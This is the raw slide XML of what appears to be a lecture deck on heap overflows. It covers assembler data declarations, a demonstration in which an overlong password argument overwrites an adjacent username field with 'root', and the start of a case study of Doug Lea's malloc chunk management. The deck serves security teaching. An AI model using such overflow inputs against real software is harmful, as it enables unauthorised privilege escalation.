            <a:pPr marL="0" indent="0">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myvar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	DD  0x12345678, 0x23456789	# Two 32-bit values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  bar		DW  0x1234 					# 16-bit data object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">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mystr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	DB 	"foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, 0   				# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ull-terminated string</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15628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4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4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4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44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4448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448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48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4448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4448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7250" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simple Heap Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077253" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="2743200"/>
            <a:ext cx="12954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600">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077254" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="2743200"/>
            <a:ext cx="23622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600">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077255" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="2743200"/>
            <a:ext cx="19812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600">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077256" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="2743200"/>
            <a:ext cx="12954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600">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077257" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="2383632"/>
            <a:ext cx="1063112" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>0x8fe3008</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077258" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="2396729"/>
            <a:ext cx="1063112" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>0x8fe3090</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077259" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304802" y="3096817"/>
            <a:ext cx="4900701" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>% test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>vigna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Wrong password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>vigna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fooooooooo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ooooooooooo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Wrong username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ooooo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>*** </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>glibc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> detected *** ./test: free(): invalid next size (fast): 0x0807f008 ***</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>======= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Backtrace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>: =========</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/lib/libc.so.6[0xb33424]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/lib/libc.so.6(__libc_free+0x77)[0xb3395f]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>./test[0x8048791]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/lib/libc.so.6(__libc_start_main+0xc6)[0xae4de6]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>./test[0x8048525]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>% test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>vigna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>foooooooo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>oooooooroot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Wrong password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>foooooooo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>oooooooroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> for user root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Segmentation fault</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="676838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9364" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Case Study: Doug </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lea’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Malloc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1039365" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Chunk Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Bin Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Memory Allocation	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Memory Deallocation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>List Handling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="60416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1422" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Memory Layout</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041423" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The heap is divided into contiguous chunks of memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Each memory chunk can be allocated, freed, split, coalesced (two free chunks)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>No two free chunks may be physically adjacent</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041424" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="4574431"/>
            <a:ext cx="9144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control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041425" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="4574431"/>
            <a:ext cx="1143000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solid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used</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041426" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="4574431"/>
            <a:ext cx="7620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free</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041427" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="4574431"/>
            <a:ext cx="9144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control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041429" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="857250" y="3943401"/>
            <a:ext cx="1249060" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Low addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041430" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410201" y="3888632"/>
            <a:ext cx="1279517" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>High addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041431" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="4574431"/>
            <a:ext cx="1447800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solid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used</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041432" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="4574431"/>
            <a:ext cx="9144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control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041433" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="4574431"/>
            <a:ext cx="14478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wilderness</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041434" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="4574431"/>
            <a:ext cx="9144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control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1982793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3460" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Chunk Management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1043461" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each chunk starts with a boundary tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Holds chunk management information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>16-byte structure, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>which is the minimum allocated size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
